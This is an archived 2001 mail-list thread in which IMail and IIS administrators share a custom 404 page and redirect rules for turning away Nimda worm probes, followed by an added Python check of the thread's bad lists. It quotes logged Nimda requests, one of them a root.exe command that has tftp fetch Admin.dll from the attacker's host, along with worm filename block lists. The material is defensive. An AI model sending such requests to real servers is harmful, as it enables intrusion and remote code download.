I did reply earlier, saying you can't use that code if you're serving IMail on port 80. If those are IIS logs, the Judo code doesn't guarantee that you won't continue to get requests. It will help by minimizing your 404 page size, and others have reported the offending servers make far fewer requests after being redirected to themselves.
-Ron

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Webmaster Oilfield Directory
> Sent: Saturday, September 29, 2001 2:54 AM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
> Importance: High
>
> Dear Ron:
>
> I wrote you about this earlier and didn't get a reply, please let me know
> what you think!
>
> I tried to implement the code you mentioned below but it seems I am still
> getting some of those bad requests... see here..
> this is the log file from imail server (standalone that is running win2k
> server and IIS 5.0 with your ezsignup utility).
>
> 20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
> 20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
> 20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
>
> any ideas, maybe I haven't configured it properly? I revised the code a bit
> to redirect to the home page after 5 seconds... could that cause it?
>
> Maybe I installed it in the wrong place, please advise me, thanks!
>
> here is my "version"
>
> <%
> myRequest=Request.ServerVariables("QUERY_STRING")
>
> 'A list of filenames virus looks for or in this case to protect
> myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida,.htr,.printer"
>
> 'Detect a GET request from the Nimda virus and take appropriate action
> arrBadString=Split(myBadList,",")
> for i=0 to UBound(arrBadString)
>   if inStr(myRequest,arrBadString(i))>0 then
>     'turn offending server back on itself
>     Response.redirect "http://127.0.0.1"
>   end if
> next
> %>
> <HTML>
> <HEAD>
> <META NAME="ROBOTS" CONTENT="NOINDEX">
>
> <SCRIPT LANGUAGE="JAVASCRIPT">
> var timerID="";
> function loadPage()
> {
>   clearTimeout(timerID);
>   window.location.href="/";
> }
> </SCRIPT>
> <SCRIPT LANGUAGE="JAVASCRIPT1.1">
> function loadPage()
> {
>   clearTimeout(timerID);
>   window.location.href="/";
> }
> </SCRIPT>
>
> <SCRIPT LANGUAGE="JAVASCRIPT1.2">
> function loadPage()
> {
>   clearTimeout(timerID);
>   window.location.href="/";
> }
> </SCRIPT>
> <a href="/">Home Page</a>.
> </HEAD>
> <BODY BGCOLOR="#000000">
>
> <BR><BR><BR><BR><BR>
>
> <CENTER><STRONG><EM>
> <FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing or has been
> moved, <br>redirecting to home page.</FONT>
> </EM></STRONG></CENTER>
>
> <SCRIPT LANGUAGE="JAVASCRIPT">
> timerID=setTimeout("loadPage()", 4500);
> </SCRIPT>
>
> </BODY>
> </HTML>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
> Hornbaker
> Sent: Friday, September 21, 2001 2:35 PM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
>
> If it's a legitimate file, it won't return a 404 error, so the Judo page
> won't be triggered. So, technically, you could make your badlist look
> something like:
>
> ".exe,.dll,.ida,.htr,.printer"
>
> and whatever else you wanted, so that any malicious-looking 404s would
> be turned back, Grasshopper-san-style.
>
> Ron Hornbaker
> President/CTO
> . . . . . . . . . . . . http://humankindsystems.com
> . . . . . . . . . . . . w e c o d e. w e c a r e.
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > Charles Frolick
> > Sent: Friday, September 21, 2001 4:30 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
> >
> > Not sure how it is used, but Frontpage extensions actually uses an admin.dll
> > in the frontpage directories. Need to make sure your sites don't need it
> > for normal operation.
> >
> > Chuck Frolick
> > ArgoNet, Inc.
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
> > Hornbaker
> > Sent: Friday, September 21, 2001 3:24 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
> >
> > Change the code to this and just edit the comma-delimited myBadList
> > variable:
> >
> > <%
> > 'Custom404.asp page to thwart Nimda DoS attacks on IIS
> > 'by Humankind Systems, Inc. http://hksi.net/
> > 'No support or guarantees of any kind are granted with this
> > 'code. Use at your own risk. Distribute freely.
> >
> > 'Get the entire URL requested
> > myRequest=Request.ServerVariables("QUERY_STRING")
> >
> > 'A list of filenames Nimda looks for
> > myBadList="cmd.exe,root.exe,admin.dll,default.ida"
> >
> > 'Detect a GET request from the Nimda virus and take appropriate action
> > arrBadString=Split(myBadList,",")
> > for i=0 to UBound(arrBadString)
> >   if inStr(myRequest,arrBadString(i))>0 then
> >     'turn offending server back on itself
> >     Response.redirect "http://127.0.0.1"
> >   end if
> > next
> > %>
> > <html>
> > <head>
> > <title>Page Not Found</title>
> > </head>
> > <body>
> > Sorry, but that page was not found on our server.
> > <p>
> > Here is a link back to our <a href="/">Home Page</a>.
> > </body>
> > </html>
> >
> > Ron Hornbaker
> > President/CTO
> > . . . . . . . . . . . . http://humankindsystems.com
> > . . . . . . . . . . . . w e c o d e. w e c a r e.
> >
> > > -----Original Message-----
> > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Len
> > > Conrad
> > > Sent: Friday, September 21, 2001 3:06 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: Fwd: [isp-linux] Re: [imail] Buaaa Haaa Ha Haaaaaaaaa...
> > >
> > > Ron,
> > >
> > > what about admin.dll, and here's a couple more
> > >
> > > Len
> > >
> > > --------------------
> > >
> > > >From: "Bill Larson" <[EMAIL PROTECTED]>
> > > >To: [EMAIL PROTECTED]
> > > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > > >Date: Fri, 21 Sep 2001 14:21:24 -0500
> > > >X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> > > >List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
> > > >Reply-To: [EMAIL PROTECTED]
> > > >X-INTM-Message-Id: <INTM-62637-1230739-2001.09.21-14.26.57--lconrad#go2france.com@lists.isp-lists.com>
> > > >X-Virus-Scanned: by VirusGate.MEIway.com
> > > >X-RCPT-TO: <[EMAIL PROTECTED]>
> > > >
> > > >RedirectMatch (.*)\cmd.exe$ http://127.0.0.1
> > > >RedirectMatch (.*)\default.ida$ http://127.0.0.1
> > > >RedirectMatch (.*)\root.exe$ http://127.0.0.1
> > > >
> > > >I added a couple
> > > >
> > > >----- Original Message -----
> > > >From: "Nick Weerheim" <[EMAIL PROTECTED]>
> > > >To: <[EMAIL PROTECTED]>
> > > >Sent: Friday, September 21, 2001 2:16 PM
> > > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > > >
> > > > > this is freaky.... the attacks here have stopped too....
> > > > > that's crazy.....
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
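
The bad-list match used by the Judo page, run offline over the log lines quoted in this thread, as an added example (not code from the thread or from Humankind Systems). It goes one step past the ASP by comparing case-sensitive substring matching, which is VBScript's InStr default, with case-insensitive matching; the log-line layout in the regex and all function names are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Log lines copied from the message quoted above (mail line-wraps rejoined).
SAMPLE_LOG = """\
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
"""

# The two bad lists posted in the thread; helper names below are this example's own.
ORIGINAL_LIST = "cmd.exe,root.exe,admin.dll,default.ida"
EXTENSION_LIST = ".exe,.dll,.ida,.htr,.printer"

# Assumed layout: date, time, client IP, three empty fields, then the request line.
LINE_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<ip>[\d.]+), , , "
    r"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/\d\.\d$"
)

def parse(log_text):
    """Yield (source_ip, percent-decoded URL) for each well-formed log line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("ip"), unquote(m.group("url"))

def first_hit(url, bad_list, ignore_case):
    """Return the first bad-list entry contained in url, or None."""
    haystack = url.lower() if ignore_case else url
    for entry in bad_list.split(","):
        needle = entry.lower() if ignore_case else entry
        if needle in haystack:
            return entry
    return None

def missed(log_text, bad_list, ignore_case):
    """URLs in the log that the given bad list would let through unmatched."""
    return [url for _, url in parse(log_text)
            if first_hit(url, bad_list, ignore_case) is None]

def hits_per_source(log_text, bad_list):
    """Count matching requests per client IP (case-insensitive match)."""
    counts = {}
    for ip, url in parse(log_text):
        if first_hit(url, bad_list, ignore_case=True):
            counts[ip] = counts.get(ip, 0) + 1
    return counts
```

With the original four-entry list, a case-sensitive match lets the `/scripts/Admin.dll` request through because the list spells it `admin.dll`; the extension-only list catches it either way.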
